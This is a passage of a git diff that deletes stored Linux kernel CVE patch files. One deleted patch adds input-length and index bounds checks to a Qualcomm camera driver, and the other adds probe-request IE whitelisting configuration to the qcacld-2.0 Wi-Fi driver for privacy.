V32_CHROMA_SUP_OFF + 4, &new_val, 4); -@@ -2637,10 +2698,23 @@ static int vfe32_proc_general( - new_val = *cmdp_local; - old_val &= MCE_Q_K_MASK; - new_val = new_val | old_val; -+ if (cmd->length < (4 + sizeof(uint32_t)*1)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - V32_CHROMA_SUP_OFF + 8, &new_val, 4); - cmdp_local += 1; -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < (vfe32_cmd[cmd->id].length + -+ sizeof(uint32_t) * (1 + 1))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - vfe32_cmd[cmd->id].offset, -@@ -2661,6 +2735,10 @@ static int vfe32_proc_general( - goto proc_general_done; - } - cmdp_local = cmdp; -+ if (cmd->length < 4) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy(vfe32_ctrl->share_ctrl->vfebase + - V32_CHROMA_SUP_OFF, cmdp_local, 4); - -@@ -2673,6 +2751,11 @@ static int vfe32_proc_general( - V32_CHROMA_SUP_OFF + 4); - old_val &= ~MCE_EN_MASK; - new_val = new_val | old_val; -+ /* As cmdp_local got incremented by 1*/ -+ if (cmd->length < (4 + sizeof(uint32_t) * 1)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - V32_CHROMA_SUP_OFF + 4, &new_val, 4); -@@ -2683,6 +2766,10 @@ static int vfe32_proc_general( - new_val = *cmdp_local; - old_val &= ~MCE_Q_K_MASK; - new_val = new_val | old_val; -+ if (cmd->length < (4 + sizeof(uint32_t) * (1 + 1))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - V32_CHROMA_SUP_OFF + 8, &new_val, 4); -@@ -2704,12 +2791,22 @@ static int vfe32_proc_general( - goto proc_general_done; - } - cmdp_local = cmdp; -+ if (cmd->length < 16) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - 
vfe32_cmd[cmd->id].offset, - cmdp_local, 16); - cmdp_local += 4; - vfe32_program_dmi_cfg(ROLLOFF_RAM0_BANK0, vfe32_ctrl); -+ if (cmd->length < (sizeof(uint32_t) * -+ (4 + V32_MESH_ROLL_OFF_INIT_TABLE_SIZE * 2 + -+ V32_MESH_ROLL_OFF_DELTA_TABLE_SIZE * 2))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - /* for loop for extrcting init table. */ - for (i = 0; i < (V32_MESH_ROLL_OFF_INIT_TABLE_SIZE * 2); i++) { - msm_camera_io_w(*cmdp_local , -@@ -2773,6 +2870,14 @@ static int vfe32_proc_general( - } - break; - case VFE_CMD_LA_CFG: -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < vfe32_cmd[cmd->id].length) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp = kmalloc(cmd->length, GFP_ATOMIC); - if (!cmdp) { - rc = -ENOMEM; -@@ -2813,6 +2918,11 @@ static int vfe32_proc_general( - cmdp_local = cmdp + 1; - old_val = msm_camera_io_r( - vfe32_ctrl->share_ctrl->vfebase + V32_LA_OFF); -+ if (cmd->length < (sizeof(uint32_t) * (1 + -+ (VFE32_LA_TABLE_LENGTH / 2)))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - if (old_val != 0x0) - vfe32_write_la_cfg(LUMA_ADAPT_LUT_RAM_BANK0, - cmdp_local, vfe32_ctrl); -@@ -2861,6 +2971,10 @@ static int vfe32_proc_general( - break; - case VFE_CMD_SK_ENHAN_CFG: - case VFE_CMD_SK_ENHAN_UPDATE:{ -+ if (cmd->length < V32_SCE_LEN) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp = kmalloc(cmd->length, GFP_ATOMIC); - if (!cmdp) { - rc = -ENOMEM; -@@ -2895,17 +3009,31 @@ static int vfe32_proc_general( - goto proc_general_done; - } - cmdp_local = cmdp; -+ if (cmd->length < V32_LINEARIZATION_LEN1) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - V32_LINEARIZATION_OFF1, - cmdp_local, V32_LINEARIZATION_LEN1); - cmdp_local += 4; -+ if (cmd->length < (V32_LINEARIZATION_LEN2 + -+ sizeof(uint32_t) * 4)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - 
vfe32_ctrl->share_ctrl->vfebase + - V32_LINEARIZATION_OFF2, - cmdp_local, V32_LINEARIZATION_LEN2); - - cmdp_local = cmdp + 17; -+ if (cmd->length < (sizeof(uint32_t) * -+ (VFE32_LINEARIZATON_TABLE_LENGTH + 17))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - vfe32_write_linear_cfg(BLACK_LUT_RAM_BANK0, - cmdp_local, vfe32_ctrl); - break; -@@ -2923,11 +3051,20 @@ static int vfe32_proc_general( - } - cmdp_local = cmdp; - cmdp_local++; -+ if (cmd->length < V32_LINEARIZATION_LEN1) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - V32_LINEARIZATION_OFF1 + 4, - cmdp_local, (V32_LINEARIZATION_LEN1 - 4)); - cmdp_local += 3; -+ if (cmd->length < (V32_LINEARIZATION_LEN2 + -+ sizeof(uint32_t) * (1 + 3))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - V32_LINEARIZATION_OFF2, -@@ -2938,6 +3075,11 @@ static int vfe32_proc_general( - vfe32_ctrl->share_ctrl->vfebase + - V32_LINEARIZATION_OFF1); - -+ if (cmd->length < (sizeof(uint32_t) * -+ (VFE32_LINEARIZATON_TABLE_LENGTH + 17))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - if (old_val != 0x0) - vfe32_write_linear_cfg(BLACK_LUT_RAM_BANK0, - cmdp_local, vfe32_ctrl); -@@ -3084,11 +3226,24 @@ static int vfe32_proc_general( - new_val = new_val | old_val; - *cmdp_local = new_val; - -+ if (cmd->length < 4) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + V32_DEMOSAICV3_0_OFF, - cmdp_local, 4); - - cmdp_local += 1; -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < (vfe32_cmd[cmd->id].length + -+ sizeof(uint32_t) * 1)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - vfe32_cmd[cmd->id].offset, -@@ -3118,10 +3273,23 @@ static int vfe32_proc_general( - - new_val = new_val | old_val; - *cmdp_local = 
new_val; -+ if (cmd->length < 4) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + V32_DEMOSAICV3_0_OFF, - cmdp_local, 4); - cmdp_local += 1; -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < (vfe32_cmd[cmd->id].length + -+ sizeof(uint32_t) * 1)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - vfe32_cmd[cmd->id].offset, -@@ -3150,9 +3318,18 @@ static int vfe32_proc_general( - - new_val = new_val | old_val; - *cmdp_local = new_val; -+ if (cmd->length < V32_DEMOSAICV3_LEN) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy(vfe32_ctrl->share_ctrl->vfebase + - V32_DEMOSAICV3_0_OFF, - cmdp_local, V32_DEMOSAICV3_LEN); -+ if (cmd->length < (V32_DEMOSAICV3_DBPC_LEN + -+ sizeof(uint32_t) * 4)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp_local += 1; - msm_camera_io_memcpy(vfe32_ctrl->share_ctrl->vfebase + - V32_DEMOSAICV3_DBPC_CFG_OFF, -@@ -3183,6 +3360,11 @@ static int vfe32_proc_general( - rc = -EFAULT; - goto proc_general_done; - } -+ if (cmd->length < (sizeof(uint32_t) * (1 + -+ VFE32_GAMMA_NUM_ENTRIES / 2))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + V32_RGB_G_OFF, - cmdp, 4); -@@ -3207,6 +3389,16 @@ static int vfe32_proc_general( - rc = -EFAULT; - goto proc_general_done; - } -+ maxvalue = (VFE32_GAMMA_CH0_G_POS > VFE32_GAMMA_CH1_B_POS) ? -+ VFE32_GAMMA_CH0_G_POS : VFE32_GAMMA_CH1_B_POS; -+ maxvalue = (maxvalue > VFE32_GAMMA_CH2_R_POS) ? 
-+ maxvalue : VFE32_GAMMA_CH2_R_POS; -+ -+ if (cmd->length < (sizeof(uint32_t) * (1 + -+ maxvalue + (VFE32_GAMMA_NUM_ENTRIES / 2)))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + V32_RGB_G_OFF, - cmdp, 4); -@@ -3236,6 +3428,17 @@ static int vfe32_proc_general( - old_val = msm_camera_io_r( - vfe32_ctrl->share_ctrl->vfebase + V32_RGB_G_OFF); - cmdp += 1; -+ -+ maxvalue = (VFE32_GAMMA_CH0_G_POS > VFE32_GAMMA_CH1_B_POS) ? -+ VFE32_GAMMA_CH0_G_POS : VFE32_GAMMA_CH1_B_POS; -+ maxvalue = (maxvalue > VFE32_GAMMA_CH2_R_POS) ? -+ maxvalue : VFE32_GAMMA_CH2_R_POS; -+ -+ if (cmd->length < (sizeof(uint32_t) * (1 + -+ maxvalue + (VFE32_GAMMA_NUM_ENTRIES / 2)))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - if (old_val != 0x0) { - vfe32_write_gamma_cfg(RGBLUT_RAM_CH0_BANK0, - cmdp + VFE32_GAMMA_CH0_G_POS, vfe32_ctrl); -@@ -3271,6 +3474,11 @@ static int vfe32_proc_general( - old_val = msm_camera_io_r( - vfe32_ctrl->share_ctrl->vfebase + V32_RGB_G_OFF); - cmdp += 1; -+ if (cmd->length < (sizeof(uint32_t) * (1 + ( -+ VFE32_GAMMA_NUM_ENTRIES / 2)))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - if (old_val != 0x0) { - vfe32_write_gamma_cfg( - RGBLUT_RAM_CH0_BANK0, cmdp, vfe32_ctrl); -@@ -3442,10 +3650,24 @@ static int vfe32_proc_general( - rc = -EFAULT; - goto proc_general_done; - } -+ /* As cmdp gets incremented 7 times in function -+ vfe32_sync_timer_start() */ -+ if (cmd->length < (sizeof(uint32_t) * 7)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - vfe32_sync_timer_start(cmdp, vfe32_ctrl); - break; - - case VFE_CMD_MODULE_CFG: { -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < vfe32_cmd[cmd->id].length) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp = kmalloc(cmd->length, GFP_ATOMIC); - if (!cmdp) { - rc = -ENOMEM; -@@ -3496,11 +3718,24 @@ static int vfe32_proc_general( - rc = -EFAULT; - goto 
proc_general_done; - } -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < vfe32_cmd[cmd->id].length) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - vfe32_cmd[cmd->id].offset, - cmdp, (vfe32_cmd[cmd->id].length)); - cmdp_local = cmdp + V32_ASF_LEN/4; -+ if (cmd->length < (sizeof(uint32_t) * (V32_ASF_LEN / 4) + -+ V32_ASF_SPECIAL_EFX_CFG_LEN)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - V32_ASF_SPECIAL_EFX_CFG_OFF, -@@ -3508,6 +3743,12 @@ static int vfe32_proc_general( - break; - - case VFE_CMD_PCA_ROLL_OFF_CFG: -+ -+ if (cmd->length < (sizeof(uint32_t) * (8 + 4 * -+ V33_PCA_ROLL_OFF_TABLE_SIZE))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp = kmalloc(cmd->length, GFP_ATOMIC); - if (!cmdp) { - rc = -ENOMEM; -@@ -3566,6 +3807,11 @@ static int vfe32_proc_general( - break; - - case VFE_CMD_PCA_ROLL_OFF_UPDATE: -+ if (cmd->length < (sizeof(uint32_t) * (8 + 4 * -+ V33_PCA_ROLL_OFF_TABLE_SIZE))) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp = kmalloc(cmd->length, GFP_ATOMIC); - if (!cmdp) { - rc = -ENOMEM; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-11022/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11022/qcacld-2.0/0001.patch deleted file mode 100644 index ef987dcb..00000000 --- a/Patches/Linux_CVEs/CVE-2017-11022/qcacld-2.0/0001.patch +++ /dev/null 
@@ -1,1217 +0,0 @@
-From 1379bfb6c09ee2ad5969db45c27fb675602b4ed0 Mon Sep 17 00:00:00 2001
-From: Rajeev Kumar Sirasanagandla
-Date: Sat, 5 Nov 2016 18:37:04 +0530
-Subject: qcacld-2.0: Add support to include selective scan IEs only
-
-Add support to include only selective IEs in probe requests in
-order to improve user's privacy.
-
-Change-Id: Ib874af7ec2f5453282ffe0e8fc2e50934460b745
-CRs-Fixed: 1086582
----
- CORE/HDD/inc/wlan_hdd_cfg.h | 79 ++++++
- CORE/HDD/inc/wlan_hdd_main.h | 5 +
- CORE/HDD/src/wlan_hdd_cfg.c | 317 +++++++++++++++++++++++++
- CORE/HDD/src/wlan_hdd_cfg80211.c | 100 +++++++-
- CORE/HDD/src/wlan_hdd_main.c | 26 +-
- CORE/MAC/inc/sirApi.h | 39 ++-
- CORE/MAC/src/pe/lim/limProcessSmeReqMessages.c | 22 +-
- CORE/SERVICES/WMA/wma.c | 128 +++++++++-
- CORE/SME/inc/csrApi.h | 4 +
- CORE/SME/src/csr/csrApiScan.c | 62 ++++-
- CORE/SME/src/pmc/pmcApi.c | 7 +-
- 11 files changed, 774 insertions(+), 15 deletions(-)
-
-diff --git a/CORE/HDD/inc/wlan_hdd_cfg.h b/CORE/HDD/inc/wlan_hdd_cfg.h
-index 6207a15..301ded4 100644
---- a/CORE/HDD/inc/wlan_hdd_cfg.h
-+++ b/CORE/HDD/inc/wlan_hdd_cfg.h
-@@ -58,6 +58,8 @@
-
- //Number of items that can be configured
- #define MAX_CFG_INI_ITEMS 1024
-+#define MAX_PRB_REQ_VENDOR_OUI_INI_LEN 160
-+#define VENDOR_SPECIFIC_IE_BITMAP 0x20000000
-
- #ifdef SAP_AUTH_OFFLOAD
- /* 802.11 pre-share key length */
-@@ -4206,6 +4208,66 @@ FG_BTC_BT_INTERVAL_PAGE_P2P_STA_DEFAULT
- #define CFG_5G_MAX_RSSI_PENALIZE_MAX (20)
- #define CFG_5G_MAX_RSSI_PENALIZE_DEFAULT (10)
-
-+/* enable/disable probe request whiltelist IE feature */
-+#define CFG_PRB_REQ_IE_WHITELIST_NAME "g_enable_probereq_whitelist_ies"
-+#define CFG_PRB_REQ_IE_WHITELIST_MIN (0)
-+#define CFG_PRB_REQ_IE_WHITELIST_MAX (1)
-+#define CFG_PRB_REQ_IE_WHITELIST_DEFAULT (0)
-+/*
-+ * For IE white listing in Probe Req, following ini parameters from
-+ * g_probe_req_ie_bitmap_0 to g_probe_req_ie_bitmap_7 are used.
User needs to
-+ * input this values in hexa decimal format, when bit is set, corresponding ie
-+ * needs to be included in probe request.
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP0_NAME "g_probe_req_ie_bitmap_0"
-+#define CFG_PRB_REQ_IE_BIT_MAP0_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP0_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP0_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP1_NAME "g_probe_req_ie_bitmap_1"
-+#define CFG_PRB_REQ_IE_BIT_MAP1_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP1_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP1_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP2_NAME "g_probe_req_ie_bitmap_2"
-+#define CFG_PRB_REQ_IE_BIT_MAP2_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP2_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP2_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP3_NAME "g_probe_req_ie_bitmap_3"
-+#define CFG_PRB_REQ_IE_BIT_MAP3_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP3_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP3_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP4_NAME "g_probe_req_ie_bitmap_4"
-+#define CFG_PRB_REQ_IE_BIT_MAP4_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP4_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP4_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP5_NAME "g_probe_req_ie_bitmap_5"
-+#define CFG_PRB_REQ_IE_BIT_MAP5_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP5_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP5_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP6_NAME "g_probe_req_ie_bitmap_6"
-+#define CFG_PRB_REQ_IE_BIT_MAP6_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP6_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP6_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP7_NAME "g_probe_req_ie_bitmap_7"
-+#define CFG_PRB_REQ_IE_BIT_MAP7_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP7_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP7_DEFAULT (0x00000000)
-+
-+/*
-+ * For vendor specific IE, Probe Req OUI types
and sub types which are
-+ * to be white listed are specifed in gProbeReqOUIs in the following
-+ * example format - gProbeReqOUIs=AABBCCDD EEFF1122
-+ */
-+#define CFG_PROBE_REQ_OUI_NAME "gProbeReqOUIs"
-+#define CFG_PROBE_REQ_OUI_DEFAULT ""
-+
-+
- /*---------------------------------------------------------------------------
- Type declarations
- -------------------------------------------------------------------------*/
-@@ -5020,6 +5082,20 @@ struct hdd_config {
- int8_t rssi_penalize_threshold_5g;
- uint8_t rssi_penalize_factor_5g;
- uint8_t max_rssi_penalize_5g;
-+
-+ bool probe_req_ie_whitelist;
-+ /* probe request bit map ies */
-+ uint32_t probe_req_ie_bitmap_0;
-+ uint32_t probe_req_ie_bitmap_1;
-+ uint32_t probe_req_ie_bitmap_2;
-+ uint32_t probe_req_ie_bitmap_3;
-+ uint32_t probe_req_ie_bitmap_4;
-+ uint32_t probe_req_ie_bitmap_5;
-+ uint32_t probe_req_ie_bitmap_6;
-+ uint32_t probe_req_ie_bitmap_7;
-+
-+ /* Probe Request multiple vendor OUIs */
-+ uint8_t probe_req_ouis[MAX_PRB_REQ_VENDOR_OUI_INI_LEN];
- };
-
- typedef struct hdd_config hdd_config_t;
-@@ -5137,6 +5213,9 @@ static __inline unsigned long utilMin( unsigned long a, unsigned long b )
- Function declarations and documentation
- -------------------------------------------------------------------------*/
- VOS_STATUS hdd_parse_config_ini(hdd_context_t *pHddCtx);
-+uint32_t hdd_validate_prb_req_ie_bitmap(hdd_context_t* pHddCtx);
-+VOS_STATUS hdd_parse_probe_req_ouis(hdd_context_t* pHddCtx);
-+void hdd_free_probe_req_ouis(hdd_context_t* pHddCtx);
- VOS_STATUS hdd_update_mac_config(hdd_context_t *pHddCtx);
- VOS_STATUS hdd_set_sme_config( hdd_context_t *pHddCtx );
- VOS_STATUS hdd_set_sme_chan_list(hdd_context_t *hdd_ctx);
-diff --git a/CORE/HDD/inc/wlan_hdd_main.h b/CORE/HDD/inc/wlan_hdd_main.h
-index 8a70ab5..953aca0 100644
---- a/CORE/HDD/inc/wlan_hdd_main.h
-+++ b/CORE/HDD/inc/wlan_hdd_main.h
-@@ -265,6 +265,8 @@ typedef v_U8_t tWlanHddMacAddr[HDD_MAC_ADDR_LEN];
-
- #define
HDD_BW_GET_DIFF(_x, _y) (unsigned long)((ULONG_MAX - (_y)) + (_x) + 1)
-
-+#define MAX_PROBE_REQ_OUIS 16
-+
- /*
- * Generic asynchronous request/response support
- *
-@@ -1894,6 +1896,9 @@ struct hdd_context_s
- vos_timer_t tdls_source_timer;
- struct hdd_scan_chan_info *chan_info;
- struct mutex chan_info_lock;
-+
-+ uint32_t no_of_probe_req_ouis;
-+ struct vendor_oui *probe_req_voui;
- };
-
- /*---------------------------------------------------------------------------
-diff --git a/CORE/HDD/src/wlan_hdd_cfg.c b/CORE/HDD/src/wlan_hdd_cfg.c
-index c00ade7..787ae45 100644
---- a/CORE/HDD/src/wlan_hdd_cfg.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg.c
-@@ -4835,6 +4835,74 @@ REG_TABLE_ENTRY g_registry_table[] =
- CFG_5G_MAX_RSSI_PENALIZE_DEFAULT,
- CFG_5G_MAX_RSSI_PENALIZE_MIN,
- CFG_5G_MAX_RSSI_PENALIZE_MAX),
-+
-+ REG_VARIABLE(CFG_PRB_REQ_IE_WHITELIST_NAME, WLAN_PARAM_Integer,
-+ hdd_config_t, probe_req_ie_whitelist,
-+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+ CFG_PRB_REQ_IE_WHITELIST_DEFAULT,
-+ CFG_PRB_REQ_IE_WHITELIST_MIN,
-+ CFG_PRB_REQ_IE_WHITELIST_MAX),
-+
-+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP0_NAME, WLAN_PARAM_HexInteger,
-+ hdd_config_t, probe_req_ie_bitmap_0,
-+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP0_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP0_MIN,
-+ CFG_PRB_REQ_IE_BIT_MAP0_MAX),
-+
-+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP1_NAME, WLAN_PARAM_HexInteger,
-+ hdd_config_t, probe_req_ie_bitmap_1,
-+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP1_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP1_MIN,
-+ CFG_PRB_REQ_IE_BIT_MAP1_MAX),
-+
-+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP2_NAME, WLAN_PARAM_HexInteger,
-+ hdd_config_t, probe_req_ie_bitmap_2,
-+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP2_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP2_MIN,
-+ CFG_PRB_REQ_IE_BIT_MAP2_MAX),
-+
-+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP3_NAME, WLAN_PARAM_HexInteger,
-+
hdd_config_t, probe_req_ie_bitmap_3,
-+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP3_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP3_MIN,
-+ CFG_PRB_REQ_IE_BIT_MAP3_MAX),
-+
-+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP4_NAME, WLAN_PARAM_HexInteger,
-+ hdd_config_t, probe_req_ie_bitmap_4,
-+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP4_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP4_MIN,
-+ CFG_PRB_REQ_IE_BIT_MAP4_MAX),
-+
-+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP5_NAME, WLAN_PARAM_HexInteger,
-+ hdd_config_t, probe_req_ie_bitmap_5,
-+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP5_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP5_MIN,
-+ CFG_PRB_REQ_IE_BIT_MAP5_MAX),
-+
-+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP6_NAME, WLAN_PARAM_HexInteger,
-+ hdd_config_t, probe_req_ie_bitmap_6,
-+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP6_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP6_MIN,
-+ CFG_PRB_REQ_IE_BIT_MAP6_MAX),
-+
-+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP7_NAME, WLAN_PARAM_HexInteger,
-+ hdd_config_t, probe_req_ie_bitmap_7,
-+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP7_DEFAULT,
-+ CFG_PRB_REQ_IE_BIT_MAP7_MIN,
-+ CFG_PRB_REQ_IE_BIT_MAP7_MAX),
-+
-+ REG_VARIABLE_STRING(CFG_PROBE_REQ_OUI_NAME, WLAN_PARAM_String,
-+ hdd_config_t, probe_req_ouis,
-+ VAR_FLAGS_OPTIONAL,
-+ (void *)CFG_PROBE_REQ_OUI_DEFAULT),
- };
-
-
-@@ -5691,6 +5759,46 @@ void print_hdd_cfg(hdd_context_t *pHddCtx)
- hddLog(LOG2, "Name = [%s] Value = [%u] ",
- CFG_TDLS_ENABLE_DEFER_TIMER,
- pHddCtx->cfg_ini->tdls_enable_defer_time);
-+
-+ hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+ CFG_PRB_REQ_IE_WHITELIST_NAME,
-+ pHddCtx->cfg_ini->probe_req_ie_whitelist);
-+
-+ hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+ CFG_PRB_REQ_IE_BIT_MAP0_NAME,
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_0);
-+
-+ hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+ CFG_PRB_REQ_IE_BIT_MAP1_NAME,
-+
pHddCtx->cfg_ini->probe_req_ie_bitmap_1);
-+
-+ hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+ CFG_PRB_REQ_IE_BIT_MAP2_NAME,
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_2);
-+
-+ hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+ CFG_PRB_REQ_IE_BIT_MAP3_NAME,
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_3);
-+
-+ hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+ CFG_PRB_REQ_IE_BIT_MAP4_NAME,
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_4);
-+
-+ hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+ CFG_PRB_REQ_IE_BIT_MAP5_NAME,
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_5);
-+
-+ hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+ CFG_PRB_REQ_IE_BIT_MAP6_NAME,
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_6);
-+
-+ hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+ CFG_PRB_REQ_IE_BIT_MAP7_NAME,
-+ pHddCtx->cfg_ini->probe_req_ie_bitmap_7);
-+
-+ hddLog(LOG2, "Name = [%s] Value =[%s]",
-+ CFG_PROBE_REQ_OUI_NAME,
-+ pHddCtx->cfg_ini->probe_req_ouis);
- }
-
- #define CFG_VALUE_MAX_LEN 256
